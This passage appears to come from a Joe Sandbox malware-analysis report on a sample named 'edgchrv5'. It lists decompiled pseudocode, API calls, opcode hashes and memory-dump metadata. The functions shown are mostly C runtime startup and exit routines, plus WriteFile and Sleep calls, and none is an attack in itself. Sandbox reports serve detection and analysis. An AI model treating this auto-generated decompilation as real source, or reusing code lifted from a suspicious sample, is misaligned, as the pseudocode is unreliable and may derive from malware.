                                                                                                • Instruction Fuzzy Hash: 6D01DBF9A4430876EB269BA89C45BBE77A59B49730F008644FA64DB2C1C935E92087A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E01002C29(void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				void* _t8;
                                                                                                				void* _t12;
                                                                                                				void* _t20;
                                                                                                				void* _t21;
                                                                                                
                                                                                                				_t21 = __eflags;
                                                                                                				E01003E98(_t12, __edi, __esi);
                                                                                                				_t8 = E01003568(_t12, __edx, __edi, _t21);
                                                                                                				 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
                                                                                                				E01002BEC( *((intOrPtr*)(_t8 + 0x54))( *((intOrPtr*)(_t8 + 0x58)), 0x100d440, 0xc)); // executed
                                                                                                				 *((intOrPtr*)(_t20 - 0x1c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t20 - 0x14))))));
                                                                                                				return E01003D36(_t12,  *(_t20 - 4),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t20 - 0x14)))))),  *((intOrPtr*)(_t20 - 0x14)));
                                                                                                			}







                                                                                                0x01002c29
                                                                                                0x01002c30
                                                                                                0x01002c35
                                                                                                0x01002c3a
                                                                                                0x01002c45
                                                                                                0x01002c51
                                                                                                0x01002c5d

                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 01002C35
                                                                                                  • Part of subcall function 01003568: __getptd_noexit.LIBCMT ref: 0100356B
                                                                                                  • Part of subcall function 01003568: __amsg_exit.LIBCMT ref: 01003578
                                                                                                  • Part of subcall function 01002BEC: __IsNonwritableInCurrentImage.LIBCMT ref: 01002BFF
                                                                                                  • Part of subcall function 01002BEC: __getptd_noexit.LIBCMT ref: 01002C0F
                                                                                                  • Part of subcall function 01002BEC: __freeptd.LIBCMT ref: 01002C19
                                                                                                  • Part of subcall function 01002BEC: ExitThread.KERNEL32 ref: 01002C22
                                                                                                • __XcptFilter.LIBCMT ref: 01002C56
                                                                                                  • Part of subcall function 01003D36: __getptd_noexit.LIBCMT ref: 01003D3E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                • String ID:
                                                                                                • API String ID: 393088965-0
                                                                                                • Opcode ID: 0b98724859f1375e897d156d32d0ad18701d52f3bbc109bf5177df51490ff775
                                                                                                • Instruction ID: 25172b4bb950764676851d522808606f1abc6e3987ba35e4af8fbcbeaf9fb2d0
                                                                                                • Opcode Fuzzy Hash: 0b98724859f1375e897d156d32d0ad18701d52f3bbc109bf5177df51490ff775
                                                                                                • Instruction Fuzzy Hash: 01E0ECB5904601AFFB1AFBA0C849FAD7765AF55301F210449E1425F2F0CA75AD40DB21
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 63%
                                                                                                			E01002CC1(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
                                                                                                				DWORD* _v8;
                                                                                                				void* _t24;
                                                                                                				DWORD* _t29;
                                                                                                				intOrPtr* _t31;
                                                                                                				void* _t33;
                                                                                                				void* _t35;
                                                                                                				void* _t46;
                                                                                                				char _t47;
                                                                                                				void* _t49;
                                                                                                				void* _t50;
                                                                                                
                                                                                                				_t49 = __esi;
                                                                                                				_t46 = __edi;
                                                                                                				_t45 = __edx;
                                                                                                				_t35 = __ebx;
                                                                                                				 *((intOrPtr*)(__eax + 4)) = __edx;
                                                                                                				E01003582(__ebx, __edi, __esi, __eflags);
                                                                                                				_t59 =  *0x101e424;
                                                                                                				if( *0x101e424 != 0) {
                                                                                                					_t33 = E01003940(_t59, 0x101e424);
                                                                                                					_pop(_t38);
                                                                                                					_t60 = _t33;
                                                                                                					if(_t33 != 0) {
                                                                                                						 *0x101e424(); // executed
                                                                                                					}
                                                                                                				}
                                                                                                				E01002C29(_t45, _t46, _t49, _t60); // executed
                                                                                                				asm("int3");
                                                                                                				_push(_t35);
                                                                                                				_push(_t46);
                                                                                                				_t47 = _a12;
                                                                                                				_v8 = 0;
                                                                                                				_t61 = _t47;
                                                                                                				if(_t47 != 0) {
                                                                                                					_push(_t49);
                                                                                                					E0100337A();
                                                                                                					_t50 = E010041EA(1, 0x214);
                                                                                                					__eflags = _t50;
                                                                                                					if(__eflags == 0) {
                                                                                                						L12:
                                                                                                						_push(_t50);
                                                                                                						E01004117(0, _t47, _t50, __eflags);
                                                                                                						__eflags = _v8;
                                                                                                						if(_v8 != 0) {
                                                                                                							E010040F4(_v8);
                                                                                                						}
                                                                                                						_t24 = 0;
                                                                                                						__eflags = 0;
                                                                                                					} else {
                                                                                                						_push( *((intOrPtr*)(E01003568(0, _t45, _t47, __eflags) + 0x6c)));
                                                                                                						_push(_t50);
                                                                                                						E01003408(0, _t47, _t50, __eflags);
                                                                                                						 *(_t50 + 4) =  *(_t50 + 4) | 0xffffffff;
                                                                                                						 *((intOrPtr*)(_t50 + 0x58)) = _a16;
                                                                                                						_t29 = _a24;
                                                                                                						 *((intOrPtr*)(_t50 + 0x54)) = _t47;
                                                                                                						__eflags = _t29;
                                                                                                						if(_t29 == 0) {
                                                                                                							_t29 =  &_a12;
                                                                                                						}
                                                                                                						_t24 = CreateThread(_a4, _a8, E01002C6A, _t50, _a20, _t29); // executed
                                                                                                						__eflags = _t24;
                                                                                                						if(__eflags == 0) {
                                                                                                							_v8 = GetLastError();
                                                                                                							goto L12;
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t31 = E010040CE(_t61);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					 *_t31 = 0x16;
                                                                                                					E010043BB(_t45, _t47, _t49);
                                                                                                					_t24 = 0;
                                                                                                				}
                                                                                                				return _t24;
                                                                                                			}













                                                                                                0x01002cc1
                                                                                                0x01002cc1
                                                                                                0x01002cc1
                                                                                                0x01002cc1
                                                                                                0x01002cc1
                                                                                                0x01002cc4
                                                                                                0x01002cc9
                                                                                                0x01002cd0
                                                                                                0x01002cd7
                                                                                                0x01002cdc
                                                                                                0x01002cdd
                                                                                                0x01002cdf
                                                                                                0x01002ce1
                                                                                                0x01002ce1
                                                                                                0x01002cdf
                                                                                                0x01002ce7
                                                                                                0x01002cec
                                                                                                0x01002cf3
                                                                                                0x01002cf4
                                                                                                0x01002cf5
                                                                                                0x01002cfa
                                                                                                0x01002cfd
                                                                                                0x01002cff
                                                                                                0x01002d1d
                                                                                                0x01002d1e
                                                                                                0x01002d2f
                                                                                                0x01002d33
                                                                                                0x01002d35
                                                                                                0x01002d81
                                                                                                0x01002d81
                                                                                                0x01002d82
                                                                                                0x01002d88
                                                                                                0x01002d8b
                                                                                                0x01002d90
                                                                                                0x01002d95
                                                                                                0x01002d96
                                                                                                0x01002d96
                                                                                                0x01002d37
                                                                                                0x01002d3c
                                                                                                0x01002d3f
                                                                                                0x01002d40
                                                                                                0x01002d48
                                                                                                0x01002d4c
                                                                                                0x01002d4f
                                                                                                0x01002d54
                                                                                                0x01002d57
                                                                                                0x01002d59
                                                                                                0x01002d5b
                                                                                                0x01002d5b
                                                                                                0x01002d6e
                                                                                                0x01002d74
                                                                                                0x01002d76
                                                                                                0x01002d7e
                                                                                                0x00000000
                                                                                                0x01002d7e
                                                                                                0x01002d76
                                                                                                0x01002d01
                                                                                                0x01002d01
                                                                                                0x01002d06
                                                                                                0x01002d07
                                                                                                0x01002d08
                                                                                                0x01002d09
                                                                                                0x01002d0a
                                                                                                0x01002d0b
                                                                                                0x01002d11
                                                                                                0x01002d19
                                                                                                0x01002d19
                                                                                                0x01002d9c

                                                                                                APIs
                                                                                                • __freefls@4.LIBCMT ref: 01002CC4
                                                                                                  • Part of subcall function 01003582: __lock.LIBCMT ref: 0100360E
                                                                                                  • Part of subcall function 01003582: InterlockedDecrement.KERNEL32(?), ref: 01003620
                                                                                                  • Part of subcall function 01003582: __lock.LIBCMT ref: 01003647
                                                                                                  • Part of subcall function 01003582: ___removelocaleref.LIBCMT ref: 0100365C
                                                                                                  • Part of subcall function 01003582: ___freetlocinfo.LIBCMT ref: 01003678
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 01002CD7
                                                                                                  • Part of subcall function 01003940: __FindPESection.LIBCMT ref: 0100399B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: __lock$CurrentDecrementFindImageInterlockedNonwritableSection___freetlocinfo___removelocaleref__freefls@4
                                                                                                • String ID:
                                                                                                • API String ID: 80049855-0
                                                                                                • Opcode ID: 83d116db6f6d927cb89be1401a50c52ee091568230e945a37a921bf8b4acbed4
                                                                                                • Instruction ID: ca6c2b50e87649f31bf20bb38a4574f24968a51e29f89d7bb6d696416515deb2
                                                                                                • Opcode Fuzzy Hash: 83d116db6f6d927cb89be1401a50c52ee091568230e945a37a921bf8b4acbed4
                                                                                                • Instruction Fuzzy Hash: E7D012300402078FF72B3BA5E90CA5C7AF4FB10111F15445967C0480D5CE3DD044C612
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E01003A81(int _a4) {
                                                                                                
                                                                                                				E01003A56(_a4);
                                                                                                				ExitProcess(_a4);
                                                                                                			}



                                                                                                0x01003a89
                                                                                                0x01003a92

                                                                                                APIs
                                                                                                • ___crtCorExitProcess.LIBCMT ref: 01003A89
                                                                                                  • Part of subcall function 01003A56: GetModuleHandleW.KERNEL32(mscoree.dll,?,01003A8E,?,?,0100780B,000000FF,0000001E,?,010041B6,?,00000001,?,?,01005C3C,00000018), ref: 01003A60
                                                                                                  • Part of subcall function 01003A56: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01003A70
                                                                                                • ExitProcess.KERNEL32 ref: 01003A92
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                • String ID:
                                                                                                • API String ID: 2427264223-0
                                                                                                • Opcode ID: 9b3f6e549bdc8304719d53b9da9fe4bf85e1af7fb789f886b7239b706b472250
                                                                                                • Instruction ID: baf91f1b8889949574a5d4255e53edcb7ed0db89a3ef2f8a66e6118fdd5c4073
                                                                                                • Opcode Fuzzy Hash: 9b3f6e549bdc8304719d53b9da9fe4bf85e1af7fb789f886b7239b706b472250
                                                                                                • Instruction Fuzzy Hash: E4B09231004108BFEB236F12DC098893F6AEB826A0F509020F89809170DF72ADA2DA94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E01005A68(intOrPtr _a4) {
                                                                                                				void* _t6;
                                                                                                
                                                                                                				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                				 *0x101cda4 = _t6;
                                                                                                				if(_t6 != 0) {
                                                                                                					 *0x101e2e0 = 1;
                                                                                                					return 1;
                                                                                                				} else {
                                                                                                					return _t6;
                                                                                                				}
                                                                                                			}




                                                                                                0x01005a7d
                                                                                                0x01005a83
                                                                                                0x01005a8a
                                                                                                0x01005a91
                                                                                                0x01005a97
                                                                                                0x01005a8d
                                                                                                0x01005a8d
                                                                                                0x01005a8d

                                                                                                APIs
                                                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 01005A7D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 10892065-0
                                                                                                • Opcode ID: c77ae1ff7676601d37d520d405f725dbb32a12adcb79d6841e45062101aff7d6
                                                                                                • Instruction ID: 534895ce18d2f2723b2a55059cb49d42ee204576214187c06bc5b317cb0efff6
                                                                                                • Opcode Fuzzy Hash: c77ae1ff7676601d37d520d405f725dbb32a12adcb79d6841e45062101aff7d6
                                                                                                • Instruction Fuzzy Hash: 1ED05E325903089EEB229E74AD08B663BDCA784395F044475F88DC6184E67DC540C600
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 79%
                                                                                                			E010016EE(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				void* _t12;
                                                                                                				void* _t13;
                                                                                                				void* _t18;
                                                                                                				void* _t19;
                                                                                                				void* _t20;
                                                                                                				void* _t23;
                                                                                                
                                                                                                				_t23 = __eflags;
                                                                                                				_t19 = __esi;
                                                                                                				_t18 = __edi;
                                                                                                				_t13 = __ecx;
                                                                                                				_t12 = __ebx;
                                                                                                				_push( *((intOrPtr*)(_t20 + __edi + 0x74)));
                                                                                                			}









                                                                                                0x010016ee
                                                                                                0x010016ee
                                                                                                0x010016ee
                                                                                                0x010016ee
                                                                                                0x010016ee
                                                                                                0x010016ee

                                                                                                APIs
                                                                                                • WriteFile.KERNELBASE(000000FF,00000000,0000B63E,00000000,00000000), ref: 01001716
                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 01001728
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseFileHandleWrite
                                                                                                • String ID:
                                                                                                • API String ID: 1769507746-0
                                                                                                • Opcode ID: fdadf8c9a0f0b6db3dc94e42deb8dc1374d796af7df6a582c8da0461edf77518
                                                                                                • Instruction ID: b9e1ebedabe7c6933527a780a95ec854b6876f3097f9e7984a1aa9ca0fcb184b
                                                                                                • Opcode Fuzzy Hash: fdadf8c9a0f0b6db3dc94e42deb8dc1374d796af7df6a582c8da0461edf77518
                                                                                                • Instruction Fuzzy Hash: 04D02E31600208B6EB62ABE88D0AA8836E93B24720F000200F1F8A31C0CB7AD5008B34
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E01003C9D(intOrPtr _a4) {
                                                                                                				void* __ebp;
                                                                                                				void* _t2;
                                                                                                				void* _t3;
                                                                                                				void* _t4;
                                                                                                				void* _t5;
                                                                                                				void* _t8;
                                                                                                
                                                                                                				_push(0);
                                                                                                				_push(0);
                                                                                                				_push(_a4);
                                                                                                				_t2 = E01003B71(_t3, _t4, _t5, _t8); // executed
                                                                                                				return _t2;
                                                                                                			}









                                                                                                0x01003ca2
                                                                                                0x01003ca4
                                                                                                0x01003ca6
                                                                                                0x01003ca9
                                                                                                0x01003cb2

                                                                                                APIs
                                                                                                • _doexit.LIBCMT ref: 01003CA9
                                                                                                  • Part of subcall function 01003B71: __lock.LIBCMT ref: 01003B7F
                                                                                                  • Part of subcall function 01003B71: __decode_pointer.LIBCMT ref: 01003BB6
                                                                                                  • Part of subcall function 01003B71: __decode_pointer.LIBCMT ref: 01003BCB
                                                                                                  • Part of subcall function 01003B71: __decode_pointer.LIBCMT ref: 01003BF5
                                                                                                  • Part of subcall function 01003B71: __decode_pointer.LIBCMT ref: 01003C0B
                                                                                                  • Part of subcall function 01003B71: __decode_pointer.LIBCMT ref: 01003C18
                                                                                                  • Part of subcall function 01003B71: __initterm.LIBCMT ref: 01003C47
                                                                                                  • Part of subcall function 01003B71: __initterm.LIBCMT ref: 01003C57
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                • String ID:
                                                                                                • API String ID: 1597249276-0
                                                                                                • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                • Instruction ID: 5343a0335ee9fd4c029c0489d09b6a1663b02d94bf0f9853fa9410883248f058
                                                                                                • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                • Instruction Fuzzy Hash: D6B0923298420837EA222546AC03F463A1997D1A64F640020BA0C1D1E0A9A2A9618099
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E010032D6() {
                                                                                                				void* _t1;
                                                                                                
                                                                                                				_t1 = E01003264(0); // executed
                                                                                                				return _t1;
                                                                                                			}




                                                                                                0x010032d8
                                                                                                0x010032de

                                                                                                APIs
                                                                                                • __encode_pointer.LIBCMT ref: 010032D8
                                                                                                  • Part of subcall function 01003264: TlsGetValue.KERNEL32(00000000,?,010032DD,00000000,01008CF5,0101C880,00000000,00000314,?,010053D3,0101C880,Microsoft Visual C++ Runtime Library,00012010), ref: 01003276
                                                                                                  • Part of subcall function 01003264: TlsGetValue.KERNEL32(00000005,?,010032DD,00000000,01008CF5,0101C880,00000000,00000314,?,010053D3,0101C880,Microsoft Visual C++ Runtime Library,00012010), ref: 0100328D
                                                                                                  • Part of subcall function 01003264: RtlEncodePointer.NTDLL(00000000,?,010032DD,00000000,01008CF5,0101C880,00000000,00000314,?,010053D3,0101C880,Microsoft Visual C++ Runtime Library,00012010), ref: 010032CB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$EncodePointer__encode_pointer
                                                                                                • String ID:
                                                                                                • API String ID: 2585649348-0
                                                                                                • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                • Instruction ID: c8d6bc852842976af8fc9478366ba43c5ee19fc6b969564a2f8440e5ca1204f5
                                                                                                • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E01001D93(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                                				void* _t265;
                                                                                                				void* _t266;
                                                                                                				void* _t334;
                                                                                                				void* _t335;
                                                                                                				void* _t337;
                                                                                                				void* _t348;
                                                                                                
                                                                                                				_t335 = __esi;
                                                                                                				_t334 = __edi;
                                                                                                				_t266 = __ecx;
                                                                                                				_t265 = __ebx;
                                                                                                				_t348 = __eax + _t337;
                                                                                                			}









                                                                                                0x01001d93
                                                                                                0x01001d93
                                                                                                0x01001d93
                                                                                                0x01001d93
                                                                                                0x01001d93

                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(000002BC), ref: 01001D9A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: 7d0094ae8d0a2586f791e56104cd893b0e3c99a76d91ceb9e68538a634076a99
                                                                                                • Instruction ID: 4a6952267c3346276b05dbc411070df77c4d860ab638cfd39e8522dbf46fa8ef
                                                                                                • Opcode Fuzzy Hash: 7d0094ae8d0a2586f791e56104cd893b0e3c99a76d91ceb9e68538a634076a99
                                                                                                • Instruction Fuzzy Hash: 41C022765002804FE3032B609C082583F20AB03723B2D078AD6A2841E7D5884001D723
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 85%
                                                                                                			E01002B7C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                				intOrPtr _v0;
                                                                                                				void* _v804;
                                                                                                				intOrPtr _v808;
                                                                                                				intOrPtr _v812;
                                                                                                				intOrPtr _t6;
                                                                                                				intOrPtr _t11;
                                                                                                				intOrPtr _t12;
                                                                                                				intOrPtr _t13;
                                                                                                				long _t17;
                                                                                                				intOrPtr _t21;
                                                                                                				intOrPtr _t22;
                                                                                                				intOrPtr _t25;
                                                                                                				intOrPtr _t26;
                                                                                                				intOrPtr _t27;
                                                                                                				intOrPtr* _t31;
                                                                                                				void* _t34;
                                                                                                
                                                                                                				_t27 = __esi;
                                                                                                				_t26 = __edi;
                                                                                                				_t25 = __edx;
                                                                                                				_t22 = __ecx;
                                                                                                				_t21 = __ebx;
                                                                                                				_t6 = __eax;
                                                                                                				_t34 = _t22 -  *0x100e004; // 0xa4df7d0e
                                                                                                				if(_t34 == 0) {
                                                                                                					asm("repe ret");
                                                                                                				}
                                                                                                				 *0x101c618 = _t6;
                                                                                                				 *0x101c614 = _t22;
                                                                                                				 *0x101c610 = _t25;
                                                                                                				 *0x101c60c = _t21;
                                                                                                				 *0x101c608 = _t27;
                                                                                                				 *0x101c604 = _t26;
                                                                                                				 *0x101c630 = ss;
                                                                                                				 *0x101c624 = cs;
                                                                                                				 *0x101c600 = ds;
                                                                                                				 *0x101c5fc = es;
                                                                                                				 *0x101c5f8 = fs;
                                                                                                				 *0x101c5f4 = gs;
                                                                                                				asm("pushfd");
                                                                                                				_pop( *0x101c628);
                                                                                                				 *0x101c61c =  *_t31;
                                                                                                				 *0x101c620 = _v0;
                                                                                                				 *0x101c62c =  &_a4;
                                                                                                				 *0x101c568 = 0x10001;
                                                                                                				_t11 =  *0x101c620; // 0x0
                                                                                                				 *0x101c51c = _t11;
                                                                                                				 *0x101c510 = 0xc0000409;
                                                                                                				 *0x101c514 = 1;
                                                                                                				_t12 =  *0x100e004; // 0xa4df7d0e
                                                                                                				_v812 = _t12;
                                                                                                				_t13 =  *0x100e008; // 0x5b2082f1
                                                                                                				_v808 = _t13;
                                                                                                				 *0x101c560 = IsDebuggerPresent();
                                                                                                				_push(1);
                                                                                                				E01005B2E(_t14);
                                                                                                				SetUnhandledExceptionFilter(0);
                                                                                                				_t17 = UnhandledExceptionFilter(0x100c188);
                                                                                                				if( *0x101c560 == 0) {
                                                                                                					_push(1);
                                                                                                					E01005B2E(_t17);
                                                                                                				}
                                                                                                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                			}



















                                                                                                0x01002b7c
                                                                                                0x01002b7c
                                                                                                0x01002b7c
                                                                                                0x01002b7c
                                                                                                0x01002b7c
                                                                                                0x01002b7c
                                                                                                0x01002b7c
                                                                                                0x01002b82
                                                                                                0x01002b84
                                                                                                0x01002b84
                                                                                                0x01003169
                                                                                                0x0100316e
                                                                                                0x01003174
                                                                                                0x0100317a
                                                                                                0x01003180
                                                                                                0x01003186
                                                                                                0x0100318c
                                                                                                0x01003193
                                                                                                0x0100319a
                                                                                                0x010031a1
                                                                                                0x010031a8
                                                                                                0x010031af
                                                                                                0x010031b6
                                                                                                0x010031b7
                                                                                                0x010031c0
                                                                                                0x010031c8
                                                                                                0x010031d0
                                                                                                0x010031db
                                                                                                0x010031e5
                                                                                                0x010031ea
                                                                                                0x010031ef
                                                                                                0x010031f9
                                                                                                0x01003203
                                                                                                0x01003208
                                                                                                0x0100320e
                                                                                                0x01003213
                                                                                                0x0100321f
                                                                                                0x01003224
                                                                                                0x01003226
                                                                                                0x0100322e
                                                                                                0x01003239
                                                                                                0x01003246
                                                                                                0x01003248
                                                                                                0x0100324a
                                                                                                0x0100324f
                                                                                                0x01003263

                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 01003219
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0100322E
                                                                                                • UnhandledExceptionFilter.KERNEL32(0100C188), ref: 01003239
                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 01003255
                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 0100325C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
